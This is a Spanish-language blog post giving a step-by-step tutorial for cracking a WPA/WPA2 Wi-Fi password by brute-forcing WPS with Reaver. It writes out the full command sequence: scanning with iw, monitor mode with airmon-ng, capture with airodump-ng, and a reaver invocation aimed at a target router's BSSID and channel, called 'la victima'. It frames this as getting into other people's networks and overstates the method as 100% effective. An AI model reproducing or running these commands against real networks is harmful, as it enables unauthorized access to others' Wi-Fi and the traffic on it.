Sacar contraseña wpa/wpa2 sin diccionario mediante Reaver

descargaHoy veremos como sacar la contraseña wpa mediante reaver por supuesto sin diccionarios. Este metodo es 100% efectivo para todos los router que tengan activado WPS.

Esta vulnerabilidad ha sido descubierta no hace mucho y un tal Craig Heffner  ha desarrolado una aplicación “reaver” que nos lo hace todo muy facilito.

Con el siguiente comando  veremos que redes están a nuestro alrededor y si tienen wps:

iw wlan1 scan

Aqui veremos todas las redes  y nos fijamos en  la mac, bssid, canal y muy importante si dispone de WPS

Apuntamos esos datos.

Pondremos nuestra tarjeta en modo monitor:

airmon-ng start wlan1  (en mi caso pudiendo ser wlan0,ath0,etc)

Echaremos nuestra conexión normal wlan1 abajo:

ifconfig wlan1 down

Supongamos que la victima tiene estas caracteristicas: WLAN_8FF8 , 6C:33:88:A1:DF:63 y esta en el canal 6

Ahora vayamos al grano:

airodump-ng mon0 -w wps-test –beacons –channel 6 –bssid 6C:33:88:A1:DF:63

Si no tienes Reaver lo puede instalar AQUÍ

y ahora lanzariamos el ataque con :

reaver -i mon0 -b mac victima -c canal de la victima -e ssid de la victima (nombre red) -d 12 -vv

En nuestro caso:

reaver -i mon0 -b 6C:33:88:A1:DF:63 -c 6 -e WLAN_8FF8 -d 12 -vv

Y ahora a esperar …. paciencia … si queremos hacer pausa para no tener que estar tanto tiempo sin conexión podemos apretar CONTROL+C y nuestro craqueo quedará salvado y podremos volver a continuar desde el punto en que se suspendio.

Puede tardar bastantes horas , en mi caso hasta 36 horas más o menos.

Saludos y hasta la próxima

Anuncios

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s